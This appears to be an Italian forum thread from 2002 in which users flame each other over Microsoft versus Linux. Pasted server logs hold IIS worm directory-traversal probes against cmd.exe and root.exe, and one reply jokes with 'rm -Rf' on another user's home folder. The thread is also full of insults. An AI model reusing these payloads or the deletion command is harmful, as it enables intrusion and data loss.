+0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:32 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 "-" "-"207.99.88.13 - - [25/Mar/2002:13:25:53 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 285 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:25 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 285 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:26 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-"AnonimoRe: Sono tutte cavolate ? Le tue !
- Scritto da: Reply> > > - Scritto da: zap> > > E' il momento di LIBERARE il mercato da un> > dittatore economico che impedisce la> crescita> > del settore.> > > > E' il momento di attuare una azione civile> > di BOICOTTAGGIO dei prodotti microsoft.> > > > E' ora di chiudere le fonti di> alimentazione> > di quell'azienda succhia-risorse che è> > microsoft: non acquistiamo (e non> > diffondiamo neanche illegalmente) il suo> > software e i suoi prodotti.> > > > Succhia risorse? quali le tue?basta notare quanti stati USA mossero l'azione contro microsoft. per risponderti.Basta notare che sono rimasti comunque 9 stati a contrastare le azioni monopolistiche di microsoft, e che tra questi stati c'è la California, la patria di Silicon Valley.Microsoft distrugge illegittimamente la concorrenza (il processo lo ha dimostrato), sopprimendo la nascita o la crescita di nuove soluzioni. *Questa* è distruzione di risorse> Microsoft e i suoi sistemi hanno molti pregi> , cosi come linux. Ma un utente medio ha> bisogno di:> 1)Un sistema operativo intuitivo e> immediato. Linux non lo è ancora.A parte che ciò non è vero: una una Mandrake o una Suse (e una RedHat), e vedrai che sarai d'accordo con me.inoltre è ormai palese il motivo per cui c'è tanta difficoltà di diffusione di Linux nel settore desktop: è perchè viene ostacolato dal monopolista come lo è stato BeOS. Agli atti del processo esistono le pressioni di microsoft sugli OEM. > 2)La possibilità di avere consulenza e> assistenza. In italiano. Linux non lo fa> ancora.sciocchezze! Esistono moltissime società di assistenza anche in Italia. Vuoi che te le citi?> 3)Un parco software ad ampio respiro e> facilmente reperibile. Linux non c'è l'ha> ancora.> Facilmente con un click. Capiscimi eh...Balle: www.rpmfind.comfacilmente con un clic, ci siamo capiti> Ma anche un'azienda (grossa non la piccola> azienda) ha bisogno di un sistema di mercato> (consulenti ecc ecc) che Linux e il suo> mondo non puo ancora fornire.Ballissime! esistono moltissime società professionali che operano su LINUX, con LINUX, e atraverso LINUX.Tempo fa ho già risposto a queste balle (diffuse ad arte) intrise di pregiudizio.AnonimoRe: Sono tutte cavolate ? Le tue !
- Scritto da: zap> Balle: www.rpmfind.com> facilmente con un clic, ci siamo capitiguarda che ora devi usare apt-get mica quel giocattolo di rpm che oltretutto a pensarci non e' free cioe' libero invece apt-get si' infatti su debian c'e' quello pensaci un po'AnonimoRe: Sono tutte cavolate ? Le tue !
- Scritto da: Reply> > > - Scritto da: zap> > > E' il momento di LIBERARE il mercato da un> > dittaore economico che impedisce la> crescita> > del settore.> > > > E' il momento di attuare una azione civile> > di BOICOTTAGGIO dei prodotti microsoft.> > > > E' ora di chiudere le fonti di> alimentazione> > di quell'azienda succhia-risorse che è> > microsoft: non acquistiamo (e non> > diffondiamo neanche illegalmente) il suo> > software e i suoi prodotti.> > > > Succhia risorse? quali le tue?> Microsoft e i suoi sistemi hanno molti pregi> , cosi come linux. Ma un utente medio ha> bisogno di:> 1)Un sistema operativo intuitivo e> immediato. Linux non lo è ancora.Perché?Specificare, please.> 2)La possibilità di avere consulenza e> assistenza. In italiano. Linux non lo fa> ancora.Falso. Esistono parecchie società che fanno assistenza su Linux. Nella mia cittàc'è un punto assistenza Redhat.> 3)Un parco software ad ampio respiro e> facilmente reperibile. Linux non c'è l'ha> ancora.Falso. Il parco software di Linux èsenz'altro meno ampio di quello di Windows ma è già abbastanza ampio.E trovi tutto con facilità, sia suriviste che comprandoti una distribuzioneda poche decine di euro. Ovviamentetrovi tutto si internet.> Facilmente con un click. Capiscimi eh...Francamente anche con Linux puoi fare parecchie cose con un click ...praticamente tutte le cose che devefare un utente base.> Se invece devi divertirti un po di piu usa> Linux> Ma anche un'azienda (grossa non la piccola> azienda) ha bisogno di un sistema di mercato> (consulenti ecc ecc) che Linux e il suo> mondo non puo ancora fornire.Falso anche questo. Consulenti Linux cisono eccome, anche in Italia.Sfoglia le pagine gialle della tua città.SalutiAnonimonon è una questione di "rientro"...
se la microsoft facesse office per linux, nel giro di un anno linux supererebbe i vari windows anche sul mercato desktop...AnonimoRe: non è una questione di
- Scritto da: CaRp\Work> se la microsoft facesse office per linux,> nel giro di un anno linux supererebbe i vari> windows anche sul mercato desktop...Staroffice? mai usato?credimi, va molto bene su linux (provato da un papà sessantenne - dopo 30 minuti faceva le presentazioni stile powerpoint)AnonimoRe: non è una questione di
poi le mandava via mail ad un amico...che ne vedeva altre...AnonimoRe: non è una questione di
- Scritto da: CaRp\Work> se la microsoft facesse office per linux,> nel giro di un anno linux supererebbe i vari> windows anche sul mercato desktop...Ma se settimana scorsa tutto il forum mi ha dato contro dicendo che StarOffice è meglio di OfficeQualcuno aveva anche tirato fuori quella immane cazzata che e' GNUMERIC.Adesso invece Office è diventata la Killer Application di LinuxLa coerenza dove è finita?AnonimoRe: non è una questione di
- Scritto da: Matteo> Ma se settimana scorsa tutto il forum mi ha> dato contro dicendo che StarOffice è meglio> di Officesicuramente come prezzo> Adesso invece Office è diventata la Killer> Application di Linuxcerto, dal momento che per la gente videoscrittura = office. Poi non si pone il problema di cosa c'e' sotto. Il problema cmq resta... sia dei doc che apri solo con office, sia del fatto che e' pesante, sia del fatto che costerebbe troppo, sia del fatto che fondamentalmente avere un prodotto non standard (perche' office non lo e'... nemmeno quando salva in rtf o in html) ti obbliga a scegliere sempre quel prodotto anche in futuro.Io sinceramente me ne frego se tu vuoi usare office. Quello che mi rompe e' quando tu imponi a me che magari ho scelto un altro prodotto, magari piu' adatto alle mie esigenze, ad acquistarne un altro piu' costoso, piu' pesante, assolutamente inutile, e per di piu' prodotto da una e una sola ditta, solo per vedere il tuo .doc che riuscirei a leggere benissimo in un formato standard.la tua liberta' finisce dove inizia la mia.AnonimoRe: non è una questione di
- Scritto da: CaRp\Work> se la microsoft facesse office per linux,> nel giro di un anno linux supererebbe i vari> windows anche sul mercato desktop...Se Microsoft facesse le applicazioni anche per gli altri SO si darebbe la zappa sui piedi.Hanno fatto delle versioni per Mac perche' sono stati costretti dall'antitrust americana.Francamente mi farei anche dei problemi ad usare Office per Linux conoscendo i precedenti... Ciao FabioAnonimoRe: non è una questione di
> se la microsoft facesse office per linux,> nel giro di un anno linux supererebbe i vari> windows anche sul mercato desktop...Non capisco perchè una mossa simile non l'abbia già fatta IBM; basterebbero Lotus SmartSuite e AS/400 Client Access e tutte le aziende con AS/400 potrebbero installare Linux sui PC.AnonimoRe: Sono tutte cavolate ? Le tue !
- Scritto da: zap> Ti sfido a farlo, se puoida quando usi debian gnu/linux/unstable ti vedo piu' massiccio e aggressivo cosi' va bene infatti il software libero ha bisogno di patrioti come noi ma non di martiri anche per questo oggi ho installato debian gnu/hurd an/alfa/beta e sono pronto a sfidare chiunque voglia sostenere il monopolio del monopolista in questo contesto sociale antagonista ammortizzato dalle tensioni di una societa' vittima del consumismo imperialista in cui i diritti degli utenti vengono prevaricati dagli sviluppatori software senza scrupoli al servizio delle multinazionali ma questo non avviene con la gpl quindi fate cmoe me e zap usare linux usate debiandammi una gdammi una pdammi una lGIPIELLEUSE KAZOOOPEN DOORINSTALL DEBIAN GNU LINUX STABLEGRAB BROOM ALIENCOMPILE OPENOFFICE WITH BROOM ALIENGIVE SOURCE TO BROOM ALIENAnonimoRe: Sono tutte cavolate
ORA CI DOVRESTI SPIEGARE PERCHE' USI WINDOWS QUANDO LINUX E' COSI' FACILE AD ESEMPIO OGGI HO ABILITATO IL CAPS LOCK RICOMPILANDO IL KERNEL E SCRIVO TUTTO MAIUSCOLO MI SEMBRA MOLTO FACILE E INTUITIVO SOLO CHE ORA DEVO RICOMPILARLO PER TOGLIERLO E QUANDO SCRIVO MAKE MAIUSCOLO NON FUNZIONA ma incollando un pezzo di nastro adesivo allo shift annullo gli effetti del caps lock e scrivo normale questo dimostra che linux e' flessibile infatti potevo anche incollare l'altro shift al contrario di windows dove c'e' un solo modo per usare caps lock ed e' quello che ha deciso microsoft ovvero premere caps lock e questo limita la mia liberta' essendo software closed ma viene spacciato per innovazione la morale e' sempre quella usate debian e seguite la buona stella ovvero il software libero e free senza mai piegarvi alle minacce e ai soprusi quindi usate debian altrimenti vi aizzo il cane ovvero rollerdog il cucciolo a reazione ma non reazionario psmario se mi leggi guarda che rollerdog si ricorda ancora quella storia della bicicletta che tu chiami incidente quindi e' meglio se non vieni piu' a trovare mia sorella che fra parentesi ti odia perche' usi stampede linux e non debian gnu/linux stableAnonimoRe: Sono tutte cavolate
- Scritto da: Linucs> ORA CI DOVRESTI SPIEGARE PERCHE' USI WINDOWS> QUANDO LINUX E' COSI' FACILE AD ESEMPIO OGGI> HO ABILITATO IL CAPS LOCK RICOMPILANDO IL> KERNEL E SCRIVO TUTTO MAIUSCOLO MI SEMBRA> MOLTO FACILE E INTUITIVO SOLO CHE ORA DEVO> RICOMPILARLO PER TOGLIERLO E QUANDO SCRIVO> MAKE MAIUSCOLO NON FUNZIONA ma incollando un> pezzo di nastro adesivo allo shift annullo> gli effetti del caps lock e scrivo normale> questo dimostra che linux e' flessibile> infatti potevo anche incollare l'altro shift> al contrario di windows dove c'e' un solo> modo per usare caps lock ed e' quello che ha> deciso microsoft ovvero premere caps lock e> questo limita la mia liberta' essendo> software closed ma viene spacciato per> innovazione la morale e' sempre quella usate> debian e seguite la buona stella ovvero il> software libero e free senza mai piegarvi> alle minacce e ai soprusi quindi usate> debian altrimenti vi aizzo il cane ovvero> rollerdog il cucciolo a reazione ma non> reazionario > > ps> > mario se mi leggi guarda che rollerdog si> ricorda ancora quella storia della> bicicletta che tu chiami incidente quindi e'> meglio se non vieni piu' a trovare mia> sorella che fra parentesi ti odia perche'> usi stampede linux e non debian gnu/linux> stableCredo che le tue parole si commentino da sole.... se tu vuoi sottostare a M$ in attesa delle patch per le sue voragini, o sottostare ad usare quello che dice lei, fatti tuoi... noi vogliamo avere e volgiamo che gli altri abbiano la possibilita' di scegliere... io sono convinto che un utente che nn sa' usare un pc, impara il primo s.o. che si trova sul pc..... quale esso possa essere si sa'...ma anche questo deve cambiare... se ti vuoi limitare a clikkare e quando hai un problema riavvii senza sapere il perche' del problema..... auguri.........AnonimoRe: Sono tutte cavolate
- Scritto da: Linucs> ORA CI DOVRESTI SPIEGARE PERCHE' USI WINDOWS> QUANDO LINUX E' COSI' FACILE AD ESEMPIO OGGI> HO ABILITATO IL CAPS LOCK RICOMPILANDO IL> KERNEL E SCRIVO TUTTO MAIUSCOLO MI SEMBRA........rm -Rf /home/linucsAnonimoW Microsoft
ma quale cappello rosso o scarpe verdi o centesimi gialli ...un'azienda che si chiama così è già poco allettante di per sè, figurarsi se vende un software scritto da bimbetti e falliti per bimbetti e falliti come il linoops!inoltre certa gente piratesca e poco rispettabile così imparentata strettamente con lo stallato dovrebbe essere spedita direttamente in galera senza neppure passare dal viavorrei proprio sapere cosa c'entra Microsoft con i loro fallimenti commercialiDell, Compaq, Hp e co alla fine avranno anche dato l'elemosina a quel CTO che con fare pateticamente piagnucoloso chiedeva se per favore gli mettevano quel porcaio di sistema operativo che nessuno vuole sul loro hardware di prima classein modo da rovinarsi la reputazione e la clientelae loro giustamente gli hanno fatto l'elemosina e l'hanno cacciato fuori!vedete cari linuxari, gli utenti finali vogliono Windows un sistema operativo scritto da persone capaci e di successo per persone capaci abbienti e di successo non Linoops che è un sistema operativo di DUBBIA PROVENIENZA scritto da incapaci falliti e pirati per altri incapaci pezzenti sbafatori e poco abbientie questa gente viene a dire che Microsoft non gli ha reso disponibile l'office su questo esempio di PIRATERIA PLATEALE su questo esempio di PLAGIO ?a quale scopo ?Saluti a tutti esclusi quei pirati haker dei linuxariI miei migliori dispetti ai linuxariil solito super-MCSE, strenuo difensore della libertà e dell'innovazioneAnonimoRe: W Microsoft
207.99.88.13 - - [25/Mar/2002:13:25:53 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 285 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:25 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 285 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:26 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:26 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:27 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:27 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:27 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:28 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:28 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:29 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:29 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:30 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:30 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:31 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 290 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:31 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 290 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:31 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:32 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 "-" "-"AnonimoRe: W Microsoft
Volevo rispondere a quella emerita testina che ha iniziato il thread, mi sembra fosse un tale MCSE (gia` uno che si chiama cosi`...), purtroppo il censore mi ha bloccato le risposte dirette.Vabbe...Dunque, che dire, a uo che e` riuscito a scrivere cosi` tante idiozie in cosi` poche righe non gli si puo` che fare i complimenti, qunque facciamoglieli !Dai tutti in coro !TU SI CHE SEI UN POVERO FALLITO !!!!Invece di insultare la gente come hai fatto senza che nessuno ti provocasse e mostrando quindi tutta la tua ingonranza non che` la tua repressione (sei forse senza il pisello ?), vedi di tornare a clickare le tue belle iconcine colorate !SALAM !AnonimoRe: W Microsoft
La gente come questa persona, è gente ignorante e non ha nessuna conoscenza informatica e non vuole comprendere quanto importante sia l'innovazione, lo sviluppo della informatica in generale. Se si continua di questo passo esisterà un'unica realtà informatica che ha nome Micro$$$$ e noi pagheremo pagheremo milioni e milioni.Cmq la tua bene amata Micro$$$$ ricorda che non ha fatto niente per circa 20 anni di vita ha solo venduto fumo, acquisito in se molte SoftwareHouse e basta. Tutti i programmi non realizzati da essa sono programmi stabili e scalabili, mentre i suoi fanno pena.Concludo dicendo povera ignoranzaCiao a tutti.AnonimoRe: W Microsoft
Nelle newsgroup (ma lo saprete già) i tizi come questo si chiamano Troll, volontariamente polemici, gettano benzina sul fuoco per poi ridere dei flames che ne scaturiscono.La soluzione è non rispondere.CiaoAnonimoRe: W Microsoft
- Scritto da: MCSESenti, troll, mi hai rotto le scatole e non resito più, quindi ti devo rispondere per le rime.Vincerai te ma almeno mi posso sfogare un po' con un pagliaccio come te!> ma quale cappello rosso o scarpe verdi o> centesimi gialli ...Beh, che c'è da ridere ? Perchè un'azienda che si chiama micro e soft ?Viste le premesse, tu ce l'hai di sicuro micro e softEd hai anche altri problemi di cui qui non mi và di discutere perchè finirei OT> un'azienda che si chiama così è già poco> allettante di per sè, figurarsi se vende un> software scritto da bimbetti e falliti per> bimbetti e falliti come il linoops!Intanto Linux è un sistema operativo scritto da persone di elevatissimo livello tecnico per persone dello stesso livello.Come tutti gli unix.Adesso tentiamo (e direi con risultati incoraggiarlo) di portarlo sul desktop e di renderlo più semplice anche ai meno esperti.Lo stesso non si può dire di Winzzoz-spazzatura, un sistema operativo scritto solo per fare soldi su persone di scalsa cultura basandosi su tecniche di marketing.Come vendere i frigoriferi agli eschimesi.Non ti rendi conto di quanto sei infantile.Sei proprio patetico.> inoltre certa gente piratesca e poco> rispettabile così imparentata strettamente> con lo stallato dovrebbe essere spedita> direttamente in galera senza neppure passare> dal viaRedHat è un'azienda pulitissima che tratta software di primo livello.E nessuno è un pirata.Lo stesso non si può dire di Microsoft che, oltre ad avere *ILLEGITTIMAMENTE* un *MONOPOLIO* ed a utilizzarlo in modo *ILLEGITTIMO*, sfrutta quanto può il software OpenSource come quello dei *BSD.Dovresti vergognarti delle tue affermazioni!Dimostri ignoranza ed incompetenza.> vorrei proprio sapere cosa c'entra Microsoft> con i loro fallimenti commerciali C'entra che Microsoft ha *UN MONOPOLIO* !E con la forza di questo *MONOPOLIO*, impedisce agli altri con prodotti migliori dei suoi di diffonderli sul mercato.E questa forza la manifesta in molteplici vie.Solo persone con le bende sugli occhi (per non dire di peggio) non lo vedono.E -per di più- ci sono le prove.> Dell, Compaq, Hp e co alla fine avranno> anche dato l'elemosina a quel CTO [...]> in modo da rovinarsi la reputazione e la> clientelaTu sei l'unica persona patetica che vedo qui in giro. E diverrai di sicuro anche piagnucoloso quando ci sarà la sentenza finale di condanna per M$.Vorrei vederti quando la spezzetteranno in tante minuscole parti!Qui, l'unico modo di rovinarti la reputazione è quello di distribuire software M$, con tutti i bachi che ci sono e con gli spyware che installi con loro.Software di m...Dì, quanto ti paga mamma M$ per fargli pubblicità ?[...]> > vedete cari linuxari, gli utenti finali> vogliono Windows un sistema operativo> scritto da persone capaci e di successo per> persone capaci abbienti e di successo HA! HA! HA! HA! HA! HA! HA! HA!HA! HA! HA! HA! HA! HA! HA! HA!Ma quali persone capaci ?Persone che non capiscono una m..za come te!Troll, sei proprio patetico!> non> Linoops che è un sistema operativo di DUBBIA> PROVENIENZA scritto da incapaci falliti e> pirati per altri incapaci pezzenti sbafatori> e poco abbientiTe lo dico un'altra volta:Non ci sono atti di pirateria nello sviluppo di LinuxE' tutto software originale, e rilasciato freeMa per te, che lo ritieni di dubbia provenienza, questo non fa differenza.Mi fai proprio pena.> > e questa gente viene a dire che Microsoft> non gli ha reso disponibile l'office su[...]> a quale scopo ?Troll, non meriteresti neppure una risposta, ma anche se non la cerci te la do lo stesso:Allo scopo di rilanciare un la competizione nel mercato dei sistemi operativi.Oggi ti sembra che ci sia una scelta se non Winzozzefetent ?Soprattutto considerando i software già acquisiti (e pagati) dai vari utenti.Ma sei cieco e questo non lo vedi.> il solito super-MCSE, strenuo difensore> della libertà e dell'innovazioneHA! HA! HA! HA! HA! HA! HA! HA!HA! HA! HA! HA! HA! HA! HA! HA!Sei proprio un pagliaccio!Sei veramente sicurio di difendere la libertà e l'innovazione ?Sei proprio sicuro che per prendere la certificazione mcse non hai imparato solo a fare la scimmia pigiando sui bottoni a schermo e sugli wizard ?E che fa il wizard *DENTRO IL SISTEMA* ?Ah ... questo *NON* ve lo insegnano ... interessante !Saluti troll, ti auguro un bel po' di "bene" ...qualcuno certificato seriamenteAnonimoArgomentazioni zero...Re: W Microsoft
vediamo questa perladi consulente IT quali argomentazioniporta, vediamo un po`, son curioso,- Scritto da: MCSEMicrosoft Certified Selfdestruction Engineeruhm, uno che ha PAGATO la microsoftper un pezzo di carta sperando che serva...> ma quale cappello rosso o scarpe verdi o> centesimi gialli ...> un'azienda che si chiama così è già poco> allettante di per sè, figurarsi se vende un> software scritto da bimbetti e falliti per> bimbetti e falliti come il linoops!hai lavorato per la Red Hat?No? e allora che parli a fare?> inoltre certa gente piratesca e poco> rispettabile così imparentata strettamente> con lo stallato dovrebbe essere spedita> direttamente in galera senza neppure passare> dal viachi usa linux e` gente piratesca?perche` non paga quello che non e` in vendita?quanto sei intelligente...> vorrei proprio sapere cosa c'entra Microsoft> con i loro fallimenti commercialifallimenti commerciali? di chi?!?!?tu in testa hai furbizia allo stato puro> Dell, Compaq, Hp e co alla fine avranno> anche dato l'elemosina a quel CTO che con> fare pateticamente piagnucoloso chiedeva se> per favore gli mettevano quel porcaio di> sistema operativo che nessuno vuole sul loro> hardware di prima classehai guardato i sorgenti del kernel?No?Allora parli a membro di cane...> in modo da rovinarsi la reputazione e la> clientelaconosci clientela rovinata da linux?No?Allora parli a membro di cane...> e loro giustamente gli hanno fatto> l'elemosina e l'hanno cacciato fuori!di che stai parlando?lo sai?No?Allora parli a membro di cane...> vedete cari linuxari, gli utenti finali> vogliono Windows un sistema operativo> scritto da persone capaci e di successo per> persone capaci abbienti e di successo non> Linoops che è un sistema operativo di DUBBIA> PROVENIENZA scritto da incapaci falliti e> pirati per altri incapaci pezzenti sbafatori> e poco abbientiCioe` chi e` abbiente scrive softwaremeglio di chi e` pezzente,e chi e` incapace sviluppa per linuxsecondo te...conosci qualche incapace come dici tu in gradodi scrivere qualche programma non banale sotto linux?No?Allora parli a membro di cane...> e questa gente viene a dire che Microsoft> non gli ha reso disponibile l'office su> questo esempio di PIRATERIA PLATEALE su> questo esempio di PLAGIO ?> a quale scopo ?sono le scimmiette che sanno SOLO usareoffice che voglio office ugualeuguale sotto linux, e ce lo trovano pure...> Saluti a tutti esclusi quei pirati haker dei> linuxariLinuxari haker? ma che sei Luca Panerai?No?Allora parli a membro di cane...> I miei migliori dispetti ai linuxari> il solito super-MCSE, strenuo difensore> della libertà e dell'innovazioneLa liberta` di avere i MIEI datinel formato proprietario di una aziendamonopolistica...questa liberta` te la puoi schiaffarenella porta parallela...Ah, ma, aspetta, non sai che Micro$oftha copiato a piene mani dal software GNUe lo ha modificato quel tanto per renderlopropritetario?No?Allora parli a membro di cane...peste TI colgaPino SilvestreAnonimoRe: W Microsoft
- Scritto da: MCSE[snip]Non sei neanche piu` divertente. Cerca di inventarti almeno qualcosa di nuovo!AnonimoRe: W Microsoft
- Scritto da: MCSE> vedete cari linuxari, gli utenti finali> vogliono Windows un sistema operativo> scritto da persone capaci e di successo per> persone capaci abbienti e di successo nonPersone capaci e di successo che mettono in vendita nuove versioni con vecchi difetti ancora irrisolti.Difetti che devono essere resi noti da terzi perche' loro sono troppo impegnati a sviluppare la prossima versione ancora piu' straordinaria (e naturalmente con lo stesso bug).E un bel giorno, dopo che hai scaricato la versione rivoluzionaria di IE 6 (e ti senti anche al sicuro perche' e' stata sviluppata facendo attenzione alla sicurazza) scopri che ha un bug che si trascina dalla versione 5, e che neanche nella 5.5 sp2 era stato risolto. Bello, funzionale, veloce, coinvolgente.. ma inaffidabile.Purtroppo questa politica viene applicata alla maggior parte del software M$.No, grazie. Ho gia' dato.CiaoFabioAnonimolotta ai monopolisti imperialisti
lotta ai monopolisti imperialistiSolo dei ragazzini ignoranti e manager esaltatipossono scegliere volontariamente di abbracciarel'imperialismo della microsoft, abbindolatidal marketing.Chi parla male di linux sicuramente non l'ha maiutilizzato.L'ignoranza dilaga, in TV non c'e` piu`cultura, si riduce la spesa per la ricercascientifica e nessuno dice niente, mentre seun calciatore ultrapagato canna un tiroscoppiano putiferi, sprange, scazzottamenti,danni...italiani, siamo un popolo di ignoranti, abbiamopolitici ignoranti, ce lo meritiamo, io vorreisapere con questi dannati presupposti quanto puo`essere oculata la scelta di regalare i dati deiministeri della pubblica amministrazione allamicro$oft in cambio di tangenti.Pian pianino i grossi capitali sono riusciti amettere fuori uso anche Di Pietro, hannosmantellato il pool di mani pulite, e ci culliamonelle false statistiche della forresterresearch senza renderci conto che in quasi tuttii PC italiani NON C'E` software italiano, ese micro$$$oft decide di triplicare il prezzodi office noi italiani siamo chinati a 90gradi pronti a farci sodomizzare ovviamentepagando con i soldi pubblici.Manca la competenza, la gente usa micro$oftperche` e` stupida, ignorante, non ha edassolutamente non vuole avere la competenzanecessaria fosse solo per distinguere tra unvirus ed un malfunzionamento di un programma.Pochi qui si rendono conto di cosa voglia dire cheMicro$$oft detiene il copyright dei formaticon cui sono conservati i LORO dati.IGNORANTI IGNORANTI IGNORANTI Pino SilvestreAnonimoRe: lotta ai monopolisti imperialisti
- Scritto da: Pino Silvestre> lotta ai monopolisti imperialisti> > Solo dei ragazzini ignoranti e manager > esaltati> possono scegliere volontariamente di > abbracciare> l'imperialismo della microsoft, > abbindolati> dal marketing.Infatti i prodotti di M$ sono prodotti commerciali. Li vendono se qualcuno li compra.Qualcuno li compra perchè li può usare senzadiventare un "Rocket Scientist".> Chi parla male di linux sicuramente non> l'ha mai> utilizzato.Io l'ho utilizzato, lo utilizzo (tanto), nonostante questo ho una pessima opinione relativamente a grande parte della fuffache si trova in una distribuzione mediae nel modello di sviluppo.> L'ignoranza dilaga, in TV non c'e`> piu`> cultura, si riduce la spesa per la > ricerca> scientifica e nessuno dice niente, > mentre se> un calciatore ultrapagato canna un > tiro> scoppiano putiferi, sprange, > scazzottamenti,> danni...Ahemm, Linux (il kernel) non mi pare un fulgido esempio di innovazione da ricerca scientifica.E' un ottimo esempio di manutenzione adattativa. > italiani, siamo un popolo di ignoranti, > abbiamo> politici ignoranti, ce lo meritiamo, io> vorrei> sapere con questi dannati presupposti quanto> puo`> essere oculata la scelta di regalare i> dati dei> ministeri della pubblica amministrazione> alla> micro$oft in cambio di tangenti.Ed allora licenziamo tutti i dipendentied al loro posto mettiamo dei nuovi assuntiche come prerequisito sappiano ricompilareun kernel Linux :-)> i PC italiani NON C'E` software > italianoPerchè, Linux è Italiano?> IGNORANTI IGNORANTI IGNORANTI > Pino SilvestreScusa Pino Silvestre, posso capireche oggi tu abbia avuto una giornataccia,ma di rendo noto che, normalmente, chi usa uno strumento, non conosce i dettagli di costruzione ed i principi fisici che ne determinano il funzionamento.AnonimoRe: lotta ai monopolisti imperialisti
- Scritto da: Mario Rossi> - Scritto da: Pino Silvestre> > lotta ai monopolisti imperialisti> > > > Solo dei ragazzini ignoranti e manager > > esaltati> > possono scegliere volontariamente di > > abbracciare> > l'imperialismo della microsoft, > > abbindolati> > dal marketing.> > Infatti i prodotti di M$ sono prodotti> commerciali. Li vendono se qualcuno li> compra.> Qualcuno li compra perchè li può usare senza> diventare un "Rocket Scientist".e` sufficiente usare Outlooke dare la propria posta ed i propridocumenti in pasto a mezza internetal primo virus,e glissi come uno sciacquone sulla folliadi tenere i propri dati (si trattadi lettere e presentazioni) in formatoproprietario; non c'e` bisogno di essere Rocket Scientist per tenere i dati in formati aperti o rifiutarsidi pubblicare i .doc sui siti dei ministeri> > Chi parla male di linux sicuramente non> > l'ha mai> > utilizzato.> Io l'ho utilizzato, lo utilizzo (tanto),> nonostante questo ho una pessima opinione > relativamente a grande parte della fuffa> che si trova in una distribuzione media> e nel modello di sviluppo.questa e` una cauna grandissima cazzaincredibile, insostenibile ca$$ateeeese TU hai usato linux io sono napoleone bonaparte> > L'ignoranza dilaga, in TV non > c'e`> > piu`> > cultura, si riduce la spesa per la > > ricerca> > scientifica e nessuno dice niente, > > mentre se> > un calciatore ultrapagato canna > un > > tiro> > scoppiano putiferi, sprange, > > scazzottamenti,> > danni...> Ahemm, Linux (il kernel) non mi pare un> fulgido esempio di innovazione da ricerca> scientifica.> E' un ottimo esempio di manutenzione> adattativa.ti sei visto i sorgenti?No?Allora parli a membro di cane> > italiani, siamo un popolo di ignoranti, > > abbiamo> > politici ignoranti, ce lo meritiamo, > io> > vorrei> > sapere con questi dannati presupposti> quanto> > puo`> > essere oculata la scelta di regalare i> > dati dei> > ministeri della pubblica > amministrazione> > alla> > micro$oft in cambio di tangenti.> Ed allora licenziamo tutti i dipendenti> ed al loro posto mettiamo dei nuovi assunti> che come prerequisito sappiano ricompilare> un kernel Linux :-)no, licenziamo chi non sa distinguereun virus o un attacco hacker da un programma malfunzionante e bacato> > i PC italiani NON C'E` software > > italiano> Perchè, Linux è Italiano?no. questo e` segno dell'ignoranza che CI portiamo sul groppone illusi di essere tecnologicamente avanzati> > IGNORANTI IGNORANTI IGNORANTI > > Pino Silvestre> Scusa Pino Silvestre, posso capire> che oggi tu abbia avuto una giornataccia,> ma di rendo noto che, normalmente, chi usa> uno strumento, non conosce i dettagli di> costruzione ed i principi fisici che ne> determinano il > funzionamento.hai posto argomentazioni zero, come tanta gente che scrivefuffa pro-micro$oftPino SilvestreAnonimoRe: lotta ai monopolisti imperialisti
